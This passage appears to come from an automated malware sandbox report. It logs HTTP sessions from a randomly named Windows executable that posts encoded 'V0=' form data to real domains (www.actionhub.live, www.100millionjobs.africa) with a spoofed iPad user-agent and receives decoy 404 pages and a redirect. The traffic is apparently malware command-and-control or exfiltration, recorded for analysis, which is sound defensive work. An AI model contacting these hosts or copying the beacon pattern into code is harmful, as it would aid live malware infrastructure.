                                                                                                                          Jan 15, 2025 18:16:33.364928961 CET1236INData Raw: 6e 61 76 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 20 64 72 6f
                                                                                                                          Data Ascii: nav-item dropdown"> <a class="nav-link dropdown-toggle" href="#" id="sub-nav1" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> Home
                                                                                                                          Jan 15, 2025 18:16:33.364943027 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 20 61 72 69 61 2d 6c 61 62 65 6c 6c 65 64 62 79 3d 22 73 75 62 2d 6e 61 76 32 22 3e 0a 0a 20
                                                                                                                          Data Ascii: <ul class="dropdown-menu" aria-labelledby="sub-nav2"> <li><a class="dropdown-item dropdown-toggle" href="#">Headers</a> <ul
                                                                                                                          Jan 15, 2025 18:16:33.364949942 CET672INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: <ul class="dropdown-menu"> <li><a class="dropdown-item" href="header2-transparent.html">Header 2 Transparent</a></li>
                                                                                                                          Jan 15, 2025 18:16:33.365006924 CET1236INData Raw: 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 20 33 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: lass="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu"> <li><a class="dropdown-item" href="header
                                                                                                                          Jan 15, 2025 18:16:33.365022898 CET224INData Raw: 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64 65 72 34 2d 64 61 72 6b 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 34 20 44 61 72 6b 3c 2f 61 3e 3c 2f 6c 69 3e 0a
                                                                                                                          Data Ascii: <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark</a></li> </ul> </li>
                                                                                                                          Jan 15, 2025 18:16:33.369776011 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23
                                                                                                                          Data Ascii: <li><a class="dropdown-item dropdown-toggle" href="#">Header 5</a> <ul class="dropdown-menu"> <li


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          7192.168.2.45001467.223.117.189804564C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 15, 2025 18:16:35.260384083 CET10759OUTPOST /gq43/ HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 10299
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Host: www.actionhub.live
                                                                                                                          Origin: http://www.actionhub.live
                                                                                                                          Referer: http://www.actionhub.live/gq43/
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Data Raw: 56 30 3d 73 39 31 48 6e 31 44 69 42 2f 78 46 64 55 6a 4e 48 32 37 47 4e 6f 71 48 48 47 43 53 48 6f 6d 50 38 6b 6a 43 6f 57 38 76 2f 4e 6d 64 4e 43 4d 6f 39 31 6b 2f 42 6f 53 6e 71 4d 48 76 39 42 68 4f 6c 4c 64 57 77 52 65 51 50 47 32 38 75 35 55 75 41 37 31 39 4a 4f 6c 4d 77 7a 4d 50 6f 6b 7a 47 4e 42 66 38 66 44 33 62 76 31 79 41 35 66 45 6e 66 41 36 57 58 61 67 70 2b 31 37 74 66 31 44 49 6d 67 74 38 58 2f 50 6f 6c 57 78 6a 69 55 31 4d 61 62 54 31 4f 4d 48 62 33 6b 46 32 59 69 61 6d 30 74 35 79 77 76 51 34 42 74 47 49 52 54 76 35 45 57 56 31 2b 73 6c 41 4c 65 56 2b 5a 39 55 56 35 79 2f 6e 46 65 50 6f 6f 6b 6e 76 6a 73 41 51 63 6b 7a 4e 52 64 71 44 34 37 67 5a 64 36 77 30 34 74 66 39 69 75 2f 48 72 76 6d 67 33 30 64 30 65 4a 42 58 67 4d 49 78 4d 4f 52 4c 70 51 54 64 79 2f 55 43 66 6a 4a 62 6b 6a 6c 61 6d 79 32 68 2b 56 56 54 6c 57 35 54 30 36 50 5a 39 41 38 30 47 58 77 2b 6c 71 64 39 32 67 4b 4a 6f 61 74 74 45 67 4f 56 36 51 36 59 2b 4e 57 56 51 77 31 6d 78 67 4e 4c 38 61 57 63 6a 4d 37 46 4a 56 31 [TRUNCATED]
                                                                                                                          Data Ascii: V0=s91Hn1DiB/xFdUjNH27GNoqHHGCSHomP8kjCoW8v/NmdNCMo91k/BoSnqMHv9BhOlLdWwReQPG28u5UuA719JOlMwzMPokzGNBf8fD3bv1yA5fEnfA6WXagp+17tf1DImgt8X/PolWxjiU1MabT1OMHb3kF2Yiam0t5ywvQ4BtGIRTv5EWV1+slALeV+Z9UV5y/nFePooknvjsAQckzNRdqD47gZd6w04tf9iu/Hrvmg30d0eJBXgMIxMORLpQTdy/UCfjJbkjlamy2h+VVTlW5T06PZ9A80GXw+lqd92gKJoattEgOV6Q6Y+NWVQw1mxgNL8aWcjM7FJV1ICA7mI6tPC9s9gmJpuq/rTHH9G3ZhMGmK1JQ/xOtWbaSv952lytlXfNp78fm6jqMnvRyLVYVDepG8TPBkPlDDOeJYnegBEelBP0NZ1ZN1z9HNXcsMgUPS2kLQBTo56XehgK36K0ou8wzKeQUkhQY+SR4U8ZkQEyp8wl0Bm3B2HcU5GFrMyOrdILvIockTeRsqFPv39IAIVQxwdpeaJuRoNNOKyzY48GaSBqt8mCQratCOEMHpzmulAloNPXZDXEznQGx0fuAAjlSuJiNIiTJO4ZpQsNbXbUYmwtT4COzEMzGPxOGpn/mUc5EdFRWfVVVpOc8TUPf2HXBwI7rcmXxYB1QWCllhuq6bJWQ60JJETMPaoGzw4Kp2IBt7IYKWDfzRL9iFuPHf0ewQNKpZVwTlUidFoRy/TlqDgOU9BgsyNobRpdDqkhLP7HFTmIHG6hfp1o/IB3yYLh6rWVayztwsKt4USF8Qk0hB6rnjNJnubvR7pMX/FPFTyk7QCbwv0049oA1lJb9V1T/o2T+b1Ci0uHsGjKZ+4DSnMB1ysVOUnIF6aRBUVT/AioqDa14SOHgTtEehK+hE1NvNC0wVCtUB0ZiNyO6ubO45GMz5VaOJFjejEuw1Vu1qydeRN9n414aYgiSBI7xsYHhPh+/yjgrGkP9wC0SxroHl2 [TRUNCATED]
                                                                                                                          Jan 15, 2025 18:16:35.922044039 CET1236INHTTP/1.1 404 Not Found
                                                                                                                          Date: Wed, 15 Jan 2025 17:16:35 GMT
                                                                                                                          Server: Apache
                                                                                                                          Content-Length: 32106
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                                                                                                          Jan 15, 2025 18:16:35.922209024 CET1236INData Raw: 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 41 4e 43 59 20 42 4f 58 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61
                                                                                                                          Data Ascii: bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL --> <link href="assets/vendor/owlcarousel/owl.carousel.min.css
                                                                                                                          Jan 15, 2025 18:16:35.922234058 CET448INData Raw: 69 74 65 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 73 65 61 72 63 68 22 3e 3c 2f 69 3e 20 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                                                                                          Data Ascii: ite"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="ju-loading-screen"> <div class="sk-double-bounce"> <div class="sk-child
                                                                                                                          Jan 15, 2025 18:16:35.922249079 CET1236INData Raw: 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 20 69 64 3d 22 74 6f 70 2d 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 31 32
                                                                                                                          Data Ascii: "container"> <div class="row" id="top-row"> <div class="col-12 col-sm-2 col-lg-5"> <div class="dropdown"> <button class="btn btn-secondary dropdown-toggle border-0 bg-transparent font-13 la
                                                                                                                          Jan 15, 2025 18:16:35.922265053 CET1236INData Raw: 6c 65 73 2d 69 63 6f 6e 70 68 6f 6e 65 22 3e 3c 2f 73 70 61 6e 3e 20 50 68 6f 6e 65 20 3a 20 20 28 38 38 38 29 20 36 30 30 30 20 36 30 30 30 20 2d 20 28 38 38 38 29 20 36 30 30 30 20 36 30 30 30 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: les-iconphone"></span> Phone : (888) 6000 6000 - (888) 6000 6000</p> </div> <div class="col-12 col-sm-5 col-lg-3 text-right"> <p class="fables-third-text-color font-13"><span class="fables-iconemail"></
                                                                                                                          Jan 15, 2025 18:16:35.922278881 CET448INData Raw: 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 6c 61 70 73 65 20 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 22 20 69 64 3d 22 66 61 62 6c 65
                                                                                                                          Data Ascii: utton> <div class="collapse navbar-collapse" id="fablesNavDropdown"> <ul class="navbar-nav mx-auto fables-nav"> <li class="nav-item dropdown">
                                                                                                                          Jan 15, 2025 18:16:35.922292948 CET1236INData Raw: 20 20 20 20 20 20 48 6f 6d 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1"> <li><a class="dropdown-item" href="home1.html">Ho
                                                                                                                          Jan 15, 2025 18:16:35.922307014 CET224INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a> <ul c
                                                                                                                          Jan 15, 2025 18:16:35.922319889 CET1236INData Raw: 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: lass="dropdown-menu"> <li><a class="dropdown-item" href="header1-transparent.html">Header 1 Transparent</a></li> <li><a cla
                                                                                                                          Jan 15, 2025 18:16:35.922337055 CET224INData Raw: 3d 22 68 65 61 64 65 72 32 2d 64 61 72 6b 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 32 20 44 61 72 6b 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: ="header2-dark.html">Header 2 Dark</a></li> </ul> </li> <li><a c
                                                                                                                          Jan 15, 2025 18:16:35.927172899 CET1236INData Raw: 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 20 33 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: lass="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu"> <li><a class="dropdown-item" href="header


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          8192.168.2.45001567.223.117.189804564C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 15, 2025 18:16:37.800493956 CET385OUTGET /gq43/?V0=h/dnkFjaM/BlMTbdESaBO4yDKWKmOcDz2FnmuGYc567+HDEruSEWMN2Hn86y4gYUgaAN9U29KGW+/f0RM4NOE/Y8+3cOhgXpERP3XxTgx1mSo6tETBq5XpQ=&6NWT=ubtLSzl HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Connection: close
                                                                                                                          Host: www.actionhub.live
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Jan 15, 2025 18:16:38.398361921 CET1236INHTTP/1.1 404 Not Found
                                                                                                                          Date: Wed, 15 Jan 2025 17:16:38 GMT
                                                                                                                          Server: Apache
                                                                                                                          Content-Length: 32106
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                                                                                                          Jan 15, 2025 18:16:38.398422956 CET1236INData Raw: 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 41 4e 43 59 20 42 4f 58 20 2d 2d 3e 0a 20 20
                                                                                                                          Data Ascii: /bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL --> <link href="assets/vendor/owlcarousel/owl.c
                                                                                                                          Jan 15, 2025 18:16:38.398461103 CET1236INData Raw: 73 70 61 72 65 6e 74 20 74 65 78 74 2d 77 68 69 74 65 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 73 65 61 72 63 68 22 3e 3c 2f 69 3e 20 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                                                                                                          Data Ascii: sparent text-white"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="ju-loading-screen"> <div class="sk-double-bounce"> <div
                                                                                                                          Jan 15, 2025 18:16:38.398478031 CET1236INData Raw: 6c 61 73 73 3d 22 6d 72 2d 31 22 3e 20 45 6e 67 6c 69 73 68 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 77 68 69 74 65 2d 63 6f 6c
                                                                                                                          Data Ascii: lass="mr-1"> English</a> <a class="dropdown-item white-color font-13 fables-second-hover-color" href="#"> <img src="assets/custom/images/France.png" alt="england flag" class="mr-1"> French</a>
                                                                                                                          Jan 15, 2025 18:16:38.398495913 CET896INData Raw: 64 20 70 6c 2d 30 22 20 68 72 65 66 3d 22 69 6e 64 65 78 2e 68 74 6d 6c 22 3e 3c 69 6d 67 20 73 72 63 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 66 61 62 6c 65 73 2d 6c 6f 67 6f 2e 70 6e 67 22 20 61 6c 74 3d 22 46 61 62
                                                                                                                          Data Ascii: d pl-0" href="index.html"><img src="assets/custom/images/fables-logo.png" alt="Fables Template" class="fables-logo"></a> <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#fablesNavDro
                                                                                                                          Jan 15, 2025 18:16:38.398528099 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 48 6f 6d 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1"> <li><a class="dropdown-item" href=
                                                                                                                          Jan 15, 2025 18:16:38.398585081 CET224INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a>
                                                                                                                          Jan 15, 2025 18:16:38.398614883 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: <ul class="dropdown-menu"> <li><a class="dropdown-item" href="header1-transparent.html">Header 1 Transparent</a></li>
                                                                                                                          Jan 15, 2025 18:16:38.398654938 CET224INData Raw: 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64 65 72 32 2d 64 61 72 6b 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 32 20 44 61 72 6b 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: down-item" href="header2-dark.html">Header 2 Dark</a></li> </ul> </li>
                                                                                                                          Jan 15, 2025 18:16:38.398699045 CET1236INData Raw: 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 20 33 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: <li><a class="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu"> <li><a class="dropdown-ite
                                                                                                                          Jan 15, 2025 18:16:38.403788090 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64 65 72 34 2d 64 61 72 6b 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 34
                                                                                                                          Data Ascii: <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark</a></li> </ul> </li>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          9192.168.2.450016136.243.64.147804564C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 15, 2025 18:16:44.300544024 CET678OUTPOST /ktot/ HTTP/1.1
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-US
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 199
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          Host: www.100millionjobs.africa
                                                                                                                          Origin: http://www.100millionjobs.africa
                                                                                                                          Referer: http://www.100millionjobs.africa/ktot/
                                                                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                                                                                                                          Data Raw: 56 30 3d 64 76 34 38 31 52 6a 79 58 58 47 31 64 58 47 69 36 6d 6c 55 43 30 68 73 62 50 34 45 77 73 54 36 69 78 61 4c 74 6d 76 5a 4f 56 61 73 73 30 73 31 38 41 37 31 42 69 63 51 33 51 62 7a 39 33 4c 71 6e 59 63 33 30 79 4f 37 33 47 39 30 79 34 4f 70 2b 54 34 56 75 4c 36 4f 36 4a 4a 6c 6a 64 58 4d 69 50 39 6c 7a 51 61 78 5a 58 4c 72 57 79 53 6f 35 4c 43 55 75 49 77 36 45 77 53 68 37 41 6d 49 70 65 38 4d 6e 66 50 52 2f 42 68 58 53 56 55 45 6c 46 45 37 43 4e 6d 4c 30 53 5a 71 48 49 77 66 74 42 33 53 6c 4a 36 55 69 31 51 4a 41 61 41 55 66 4e 58 56 30 36 42 42 44 73 52 45 78 55 4e 35 50 41 3d 3d
                                                                                                                          Data Ascii: V0=dv481RjyXXG1dXGi6mlUC0hsbP4EwsT6ixaLtmvZOVass0s18A71BicQ3Qbz93LqnYc30yO73G90y4Op+T4VuL6O6JJljdXMiP9lzQaxZXLrWySo5LCUuIw6EwSh7AmIpe8MnfPR/BhXSVUElFE7CNmL0SZqHIwftB3SlJ6Ui1QJAaAUfNXV06BBDsRExUN5PA==
                                                                                                                          Jan 15, 2025 18:16:44.948040009 CET493INHTTP/1.1 302 Found
                                                                                                                          Date: Wed, 15 Jan 2025 17:16:44 GMT
                                                                                                                          Server: Apache
                                                                                                                          Location: http://maximumgroup.co.za/ktot/
                                                                                                                          Content-Length: 290
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html; charset=iso-8859-1
